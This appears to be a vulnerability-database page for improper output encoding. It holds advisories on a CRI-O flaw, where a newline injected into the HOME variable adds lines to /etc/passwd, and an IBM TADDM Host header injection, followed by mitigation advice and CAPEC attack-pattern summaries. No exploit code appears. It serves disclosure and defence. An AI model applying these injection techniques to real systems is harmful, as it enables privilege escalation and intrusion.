Vulnerability from github – Published: 2026-07-15 15:33 – Updated: 2026-07-15 15:33
VLAI
Details

A flaw was found in CRI-O. The fix for a previous vulnerability (CVE-2022-4318) was incorrect, allowing it to be bypassed. An attacker capable of setting environment variables on a container can inject a newline character into the HOME environment variable. This issue allows the addition of arbitrary lines into /etc/passwd by use of a specially crafted environment variable.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-15809"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-116",
      "CWE-134"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-07-15T13:17:03Z",
    "severity": "HIGH"
  },
  "details": "A flaw was found in CRI-O. The fix for a previous vulnerability (CVE-2022-4318) was incorrect, allowing it to be bypassed. An attacker capable of setting environment variables on a container can inject a newline character into the HOME environment variable. This issue allows the addition of arbitrary lines into /etc/passwd by use of a specially crafted environment variable.",
  "id": "GHSA-9gq4-2485-q63q",
  "modified": "2026-07-15T15:33:03Z",
  "published": "2026-07-15T15:33:03Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-15809"
    },
    {
      "type": "WEB",
      "url": "https://github.com/cri-o/cri-o/pull/6450"
    },
    {
      "type": "WEB",
      "url": "https://github.com/cri-o/cri-o/pull/6524"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/security/cve/CVE-2026-15809"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/security/cve/cve-2022-4318"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2500846"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-9HCH-G858-CR9J

Vulnerability from github – Published: 2024-02-02 15:30 – Updated: 2024-02-02 15:30
VLAI
Details

IBM Tivoli Application Dependency Discovery Manager 7.3.0.0 through 7.3.0.10 is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers. This could allow an attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking. IBM X-Force ID: 270270.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-47143"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-116",
      "CWE-644"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-02-02T13:15:08Z",
    "severity": "CRITICAL"
  },
  "details": "IBM Tivoli Application Dependency Discovery Manager 7.3.0.0 through 7.3.0.10 is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers.  This could allow an attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking.  IBM X-Force ID:  270270.",
  "id": "GHSA-9hch-g858-cr9j",
  "modified": "2024-02-02T15:30:28Z",
  "published": "2024-02-02T15:30:28Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47143"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/270270"
    },
    {
      "type": "WEB",
      "url": "https://www.ibm.com/support/pages/node/7105139"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation MIT-4.3
Architecture and Design

Strategy: Libraries or Frameworks

  • Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
  • For example, consider using the ESAPI Encoding control [REF-45] or a similar tool, library, or framework. These will help the programmer encode outputs in a manner less prone to error.
  • Alternately, use built-in functions, but consider using wrappers in case those functions are discovered to have a vulnerability.
Mitigation MIT-27
Architecture and Design

Strategy: Parameterization

  • If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.
  • For example, stored procedures can enforce database query structure and reduce the likelihood of SQL injection.
Mitigation
Architecture and Design Implementation

Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies.

Mitigation
Architecture and Design

In some cases, input validation may be an important strategy when output encoding is not a complete solution. For example, you may be providing the same output that will be processed by multiple consumers that use different encodings or representations. In other cases, you may be required to allow user-supplied input to contain control information, such as limited HTML tags that support formatting in a wiki or bulletin board. When this type of requirement must be met, use an extremely strict allowlist to limit which control sequences can be used. Verify that the resulting syntactic structure is what you expect. Use your normal encoding methods for the remainder of the input.

Mitigation
Architecture and Design

Use input validation as a defense-in-depth measure to reduce the likelihood of output encoding errors (see CWE-20).

Mitigation
Requirements

Fully specify which encodings are required by components that will be communicating with each other.

Mitigation
Implementation

When exchanging data between components, ensure that both components are using the same character encoding. Ensure that the proper encoding is applied at each interface. Explicitly set the encoding you are using whenever the protocol allows you to do so.

CAPEC-104: Cross Zone Scripting

An attacker is able to cause a victim to load content into their web-browser that bypasses security zone controls and gain access to increased privileges to execute scripting code or other web objects such as unsigned ActiveX controls or applets. This is a privilege elevation attack targeted at zone-based web-browser security.

CAPEC-73: User-Controlled Filename

An attack of this type involves an adversary inserting malicious characters (such as a XSS redirection) into a filename, directly or indirectly that is then used by the target software to generate HTML text or other potentially executable content. Many websites rely on user-generated content and dynamically build resources like files, filenames, and URL links directly from user supplied data. In this attack pattern, the attacker uploads code that can execute in the client browser and/or redirect the client browser to a site that the attacker owns. All XSS attack payload variants can be used to pass and exploit these vulnerabilities.

CAPEC-81: Web Server Logs Tampering

Web Logs Tampering attacks involve an attacker injecting, deleting or otherwise tampering with the contents of web logs typically for the purposes of masking other malicious behavior. Additionally, writing malicious data to log files may target jobs, filters, reports, and other agents that process the logs in an asynchronous attack pattern. This pattern of attack is similar to "Log Injection-Tampering-Forging" except that in this case, the attack is targeting the logs of the web server and not the application.

CAPEC-85: AJAX Footprinting

This attack utilizes the frequent client-server roundtrips in Ajax conversation to scan a system. While Ajax does not open up new vulnerabilities per se, it does optimize them from an attacker point of view. A common first step for an attacker is to footprint the target environment to understand what attacks will work. Since footprinting relies on enumeration, the conversational pattern of rapid, multiple requests and responses that are typical in Ajax applications enable an attacker to look for many vulnerabilities, well-known ports, network locations and so on. The knowledge gained through Ajax fingerprinting can be used to support other attacks, such as XSS.